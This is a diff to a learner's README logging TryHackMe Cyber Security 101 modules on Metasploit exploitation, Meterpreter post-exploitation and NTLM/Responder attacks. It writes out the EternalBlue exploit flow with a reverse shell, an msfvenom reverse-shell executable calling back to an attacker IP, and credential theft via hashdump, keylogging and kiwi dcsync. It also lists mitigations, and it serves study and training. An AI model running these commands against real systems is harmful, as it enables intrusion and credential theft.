FernandoMeri/TryHackMe-CyberSecurity101/README.md

 - Centrally managing access to multiple compromised systems.

 > **Key Skill Acquired:** The ability to navigate the `msfconsole` interface, search for modules relevant to a target, and apply the fundamental flow of `use -> configure -> run` to execute them.

+## Module Completed: Metasploit: Exploitation ##

+**Completion Date:** [2025/09/30]

+1. Module Objective
+Demonstrate the complete Metasploit workflow, from passive reconnaissance to remote code execution (RCE).

+Master project data management (hosts, services, workspaces) within the Metasploit console.

+2. Key Project Phases (High-Level Commands)
+Phase    Demonstrated Task    Essential Commands
+I. Setup & Management
+Initialize the database and create the project workspace.

+systemctl start postgresql, sudo -u postgres msfdb init, workspace -a [name]

+II.
+Reconnaissance
+Scan services and automatically save hosts to the database.

+db_nmap -sV [target IP] /

+hosts / services

+III.
+Exploitation (Example: MS17-010)
+Use the exploit module and configure the

+Reverse Shell payload.

+use exploit/windows/smb/ms17_010_eternalblue /

+set payload generic/shell_reverse_tcp /

+set LHOST [Your IP] /

+run

+IV.
+Post-Exploitation
+Management of multiple accesses (sessions) in the background.

+sessions -l / sessions -i [ID]

+Export to spreadsheets
+3. Customization Tools (MSFVENOM)

+Function: Creation of independent payloads for scenarios where a direct exploit is not used (e.g., in a file upload vulnerability on a website).

+Key Command Example:

+Bash

+# Creating a Windows executable file that calls the attacking machine
+msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.X.X LPORT=XXXX -f exe > rev_shell.exe

+The Handler: The crucial step is to configure the listener to catch that connection: use exploit/multi/handler.

+4. Conclusions and Defense
+Mitigation: How was the vulnerability that was attacked defended?
+(E.g., “The MS17-010 vulnerability was mitigated by installing the Microsoft security patch and disabling SMBv1.”)

+Lesson learned: (e.g., “The importance of not skipping the information gathering phase, as the success of the exploit depends on knowing the services running on the target.”)

+## Module Completed: Metasploit: Meterpeter ##

+**Completion Date:** [2025/09/30]

+1. Module Objective: Post-Exploitation with Meterpreter Demonstrate complete control over a remote host after a successful exploit.

+Master critical commands for management, lateral movement, and credential theft.

+2. Survival and Stealth Commands (Core Commands)
+Key Task    Command/Technique    Notes and Value Stability    migrate [PID]
+Migrated the session to a stable process (e.g., a system service) to avoid losing the connection if the initial process fails.

+Identity    getuid
+View the privilege level (Ideally:

+NT AUTHORITY\\SYSTEM) to know what to attempt next.

+Listing    ps
+Processes were listed to identify targets for migration and obtain system information.

+Native Access    shell
+Obtain a normal command line from the victim to execute binaries not available in Meterpreter.

+Export to Spreadsheets
+3. Information and Credential Gathering (The Gold)

+Password Hashes: The hashdump command was used to extract NTLM hashes from the Windows SAM database.

+Next Step: These hashes are valuable for Pass-the-Hash attacks or for cracking the password.

+Keystroke Capture: A keylogger was configured using keyscan_start and keyscan_dump to capture user activity.

+Important Files: Use search -f [name] to locate specific files (such as flags in CTFs or configuration files).

+4. Advanced Post-Exploitation (Bonus Track)

+Additional Modules: Demonstrated how to use the load kiwi command to access more powerful tools for credential extraction, such as creds_all and dcsync.

+Code Execution: Used the load python (or Ruby) command to execute scripts directly in memory.

+## Module Completed: Moniker Link ##
+**Completion Date: [2025/10/01]
+Section    Content    Value for Employment
+I. Concept of NTLM    Brief explanation: NTLM does not send the password, but rather a hash (a digital fingerprint) that can be decrypted or used in a Pass-the-Hash attack.
+Demonstrates knowledge of Windows authentication.

+II.
+The Role of Responder    Responder is a passive man-in-the-middle that listens for specific requests (such as NetBIOS/LLMNR).
+Explain: Responder impersonates a server so that the victim sends the hash to it.
+Demonstrates knowledge of network and attack tools.

+III.
+The Defense How to mitigate this attack: 1.
+Disable LLMNR/NetBIOS.
+2. Enforce SMB signing.
+3. Use Kerberos authentication instead of NTLM.
+High Value: Demonstrates that you know how to secure, not just attack.